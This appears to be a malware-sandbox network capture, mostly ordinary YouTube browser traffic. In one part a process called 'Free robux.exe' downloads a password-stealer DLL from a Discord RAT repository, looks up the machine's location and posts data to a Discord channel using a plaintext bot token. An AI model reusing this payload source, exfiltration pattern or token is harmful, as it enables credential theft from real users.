Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:44 GMT
Server: gvs 1.0
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:44 GMT
Server: gvs 1.0
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.187.206
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.187.206:443RequestOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-encoding,content-type,x-goog-authuser
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:44 GMT
Server: gvs 1.0
-
GEThttps://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCmsedge.exeRemote address:74.125.3.169:443RequestGET /videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC HTTP/1.1
Host: rr4---sn-q4fl6nsd.googlevideo.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.youtube.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.youtube.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/plain
Content-Length: 0
Connection: close
Access-Control-Allow-Origin: https://www.youtube.com
Access-Control-Allow-Credentials: true
Timing-Allow-Origin: https://www.youtube.com
Access-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-Ms
Vary: Origin
Cross-Origin-Resource-Policy: cross-origin
X-Content-Type-Options: nosniff
Date: Fri, 31 Jan 2025 13:12:44 GMT
Server: gvs 1.0
-
Remote address:8.8.8.8:53Request169.3.125.74.in-addr.arpaIN PTRResponse169.3.125.74.in-addr.arpaIN PTRdfw25s36-in-f91e100net
-
Remote address:8.8.8.8:53Request3.169.217.172.in-addr.arpaIN PTRResponse3.169.217.172.in-addr.arpaIN PTRlhr25s26-in-f31e100net
-
Remote address:8.8.8.8:53Requestjnn-pa.googleapis.comIN AResponsejnn-pa.googleapis.comIN A142.250.178.10jnn-pa.googleapis.comIN A142.250.187.234jnn-pa.googleapis.comIN A172.217.169.74jnn-pa.googleapis.comIN A172.217.16.234jnn-pa.googleapis.comIN A216.58.212.202jnn-pa.googleapis.comIN A172.217.169.42jnn-pa.googleapis.comIN A142.250.179.234jnn-pa.googleapis.comIN A142.250.200.42jnn-pa.googleapis.comIN A216.58.201.106jnn-pa.googleapis.comIN A142.250.187.202jnn-pa.googleapis.comIN A172.217.169.10jnn-pa.googleapis.comIN A142.250.200.10jnn-pa.googleapis.comIN A142.250.180.10jnn-pa.googleapis.comIN A216.58.204.74jnn-pa.googleapis.comIN A216.58.213.10jnn-pa.googleapis.comIN A216.58.212.234
-
Remote address:142.250.178.10:443RequestOPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/2.0
host: jnn-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: https://www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request10.178.250.142.in-addr.arpaIN PTRResponse10.178.250.142.in-addr.arpaIN PTRlhr48s27-in-f101e100net
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.180.14
-
POSThttps://consent.youtube.com/save?continue=https://www.youtube.com/&gl=GB&m=0&pc=yt&x=5&src=2&hl=en&bl=721127043&cm=2&set_eom=truemsedge.exeRemote address:142.250.180.14:443RequestPOST /save?continue=https://www.youtube.com/&gl=GB&m=0&pc=yt&x=5&src=2&hl=en&bl=721127043&cm=2&set_eom=true HTTP/2.0
host: consent.youtube.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain
accept: */*
origin: https://www.youtube.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=0vt03kColho
cookie: __Secure-YEC=CgttN0pldXhOWm81QSjJmPO8BjIKCgJHQhIEGgAgGw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
cookie: PREF=tz=UTC
cookie: SOCS=CAESEwgDEgk3MjExMjcwNDMaAmVuIAEaBgiApfC8Bg
-
Remote address:8.8.8.8:53Request14.180.250.142.in-addr.arpaIN PTRResponse14.180.250.142.in-addr.arpaIN PTRlhr25s32-in-f141e100net
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.109.133
-
GEThttps://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dllFree robux.exeRemote address:185.199.110.133:443RequestGET /moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dll HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 54272
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "7112266c5dad3b937e20e4c37e8c5557560abc284968341a0d1bd3d02a133db0"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4BA:346F86:D42A9:12FBC6:679CC8F0
Accept-Ranges: bytes
Date: Fri, 31 Jan 2025 13:12:51 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600044-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1738329172.844928,VS0,VE116
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 90cdc3491cbb37349a07cd8265ab29988b597d85
Expires: Fri, 31 Jan 2025 13:17:51 GMT
Source-Age: 0
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 20
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=13e5e2aadfd511efb9f6feec9d74a68a; Expires=Wed, 30-Jan-2030 13:12:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1738329173.601
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQysHM6lwUYiYh6z0R%2FYvIYKf60Kc7tg4kenU1Ycol4n97Bhf33C98NG3lpiee7m02Ea2id89IvgfIvUl1VALPslWkJ8FxohWYP3xaw9UnhGnqJNaS0ZD823QW27"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=13e5e2aadfd511efb9f6feec9d74a68af09fc05bb7210423517e8a0377c44d29d593e74081a59228f57136716d96919e; Expires=Wed, 30-Jan-2030 13:12:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=645b185fc977cb54b0002f6a95588af855a39e32-1738329172; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=gJ11jyEXwdHBZhyydz_7BTOT2QRnxbf5o5JbC8r8SsY-1738329172709-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f4afe96abec9-LHR
-
Remote address:8.8.8.8:53Request133.110.199.185.in-addr.arpaIN PTRResponse133.110.199.185.in-addr.arpaIN PTRcdn-185-199-110-133githubcom
-
Remote address:162.159.128.233:443RequestPOST /api/v9/channels/1334873496756424744/messages HTTP/1.1
authorization: Bot MTMzNDc5OTg4Mjg4Nzg4ODk1OQ.GYogWp.NMtpgtuN4Hf6PsEomIL-OoyUKqRkEVtf5alRts
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __dcfduid=141c4e12dfd511efa3645e5569300189; Expires=Wed, 30-Jan-2030 13:12:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1738329174.599
x-ratelimit-reset-after: 1.622
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WoN%2Bzv8jnF4k8jl7fl0nJyzAMhn40wOvqTdXdNO5qgDsNvmii67%2FOJIyeqeGnEE%2FkKeejR8j3ddN4s%2BMBuHMbG4er78fbb9UPdWyijZIMtMs%2FJ91smxIV2hnwyDH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
Set-Cookie: __sdcfduid=141c4e12dfd511efa3645e5569300189090892de7041acf19f5aacfbc1a449b75cd3cb4de4b1c93a2042f3f5147f5713; Expires=Wed, 30-Jan-2030 13:12:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=6bb3208142df115d03f902f291b71f760939008f-1738329173; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=c7jWxBv.C0cuAnVyHKg4tILjjDD03GYkbdycJavq03E-1738329173064-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 90a9f4b25ca271c6-LHR
-
2.6kB 33.9kB 38 46
HTTP Request
GET https://gateway.discord.gg/?v=9&encording=jsonHTTP Response
101 -
162.159.128.233:443https://discord.com/api/v9/guilds/1334800372321222707/channelstls, httpFree robux.exe1.1kB 5.8kB 10 12
HTTP Request
POST https://discord.com/api/v9/guilds/1334800372321222707/channelsHTTP Response
201 -
1.1kB 5.1kB 12 12
HTTP Request
GET https://geolocation-db.com/jsonHTTP Response
301HTTP Request
GET https://geolocation-db.com/json/HTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.3kB 3.4kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe443.1kB 8.9kB 329 137
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.3kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.2kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.1kB 3.2kB 8 9
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
1.0kB 4.6kB 8 9
-
1.0kB 8.1kB 9 9
-
1.1kB 8.1kB 9 9
-
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.3kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.2kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.2kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.3kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
142.250.200.46:443https://www.youtube.com/s/desktop/b1a23d83/cssbin/www-main-desktop-watch-page-skeleton.csstls, http2msedge.exe44.5kB 2.1MB 905 1502
HTTP Request
GET https://youtube.com/HTTP Request
GET https://www.youtube.com/HTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/desktop_polymer.vflset/desktop_polymer.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.jsHTTP Request
